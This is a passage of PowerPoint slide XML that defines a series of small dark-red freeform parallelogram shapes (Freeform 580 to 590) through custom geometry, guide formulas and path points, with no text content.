                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="19"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10531" name="Freeform 580"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="2997"/>
              <a:ext cx="35" cy="46"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 18 h 46"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 46 h 46"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 46"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 46"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 18 h 46"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 46"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 46 h 46"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="46">
                  <a:moveTo>
                    <a:pt x="35" y="18"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="18"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10532" name="Freeform 581"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="2977"/>
              <a:ext cx="34" cy="46"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 18 h 46"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 46 h 46"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 46"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 46"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 18 h 46"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 46"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 46 h 46"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="46">
                  <a:moveTo>
                    <a:pt x="34" y="18"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="18"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10533" name="Freeform 582"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="2966"/>
              <a:ext cx="17" cy="36"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 10 h 36"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 36 h 36"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 28 h 36"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 36"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 10 h 36"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 36"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 36 h 36"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="36">
                  <a:moveTo>
                    <a:pt x="17" y="10"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="10"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10534" name="Freeform 583"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3087"/>
              <a:ext cx="35" cy="52"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 22 h 52"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 29 h 52"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 22 h 52"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 52"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 52 h 52"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="52">
                  <a:moveTo>
                    <a:pt x="35" y="22"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="22"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10535" name="Freeform 584"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3064"/>
              <a:ext cx="35" cy="52"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 23 h 52"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 52"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 23 h 52"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 52"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 52 h 52"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="52">
                  <a:moveTo>
                    <a:pt x="35" y="23"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="23"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10536" name="Freeform 585"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3042"/>
              <a:ext cx="34" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 21 h 49"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 49 h 49"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 27 h 49"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 49"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 21 h 49"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 49"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 49 h 49"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="49">
                  <a:moveTo>
                    <a:pt x="34" y="21"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="21"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10537" name="Freeform 586"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3030"/>
              <a:ext cx="17" cy="39"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 11 h 39"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 39 h 39"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 27 h 39"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 39"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 11 h 39"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 39"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 39 h 39"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="39">
                  <a:moveTo>
                    <a:pt x="17" y="11"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="39"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="11"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10538" name="Freeform 587"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3185"/>
              <a:ext cx="12" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 12"/>
                <a:gd name="T1" fmla="*/ 8 h 38"/>
                <a:gd name="T2" fmla="*/ 12 w 12"/>
                <a:gd name="T3" fmla="*/ 38 h 38"/>
                <a:gd name="T4" fmla="*/ 0 w 12"/>
                <a:gd name="T5" fmla="*/ 30 h 38"/>
                <a:gd name="T6" fmla="*/ 0 w 12"/>
                <a:gd name="T7" fmla="*/ 0 h 38"/>
                <a:gd name="T8" fmla="*/ 12 w 12"/>
                <a:gd name="T9" fmla="*/ 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8"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="8"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10539" name="Freeform 588"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3158"/>
              <a:ext cx="35" cy="55"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 24 h 55"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 55 h 55"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 55"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 55"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 24 h 55"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 55"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 55 h 55"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="55">
                  <a:moveTo>
                    <a:pt x="35" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="24"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10540" name="Freeform 589"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3132"/>
              <a:ext cx="35" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 26 h 54"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 54 h 54"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 54"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 54"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 26 h 54"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 54"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 54 h 54"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="54">
                  <a:moveTo>
                    <a:pt x="35" y="26"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="26"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10541" name="Freeform 590"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3108"/>
              <a:ext cx="34" cy="52"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 24 h 52"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 52 h 52"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
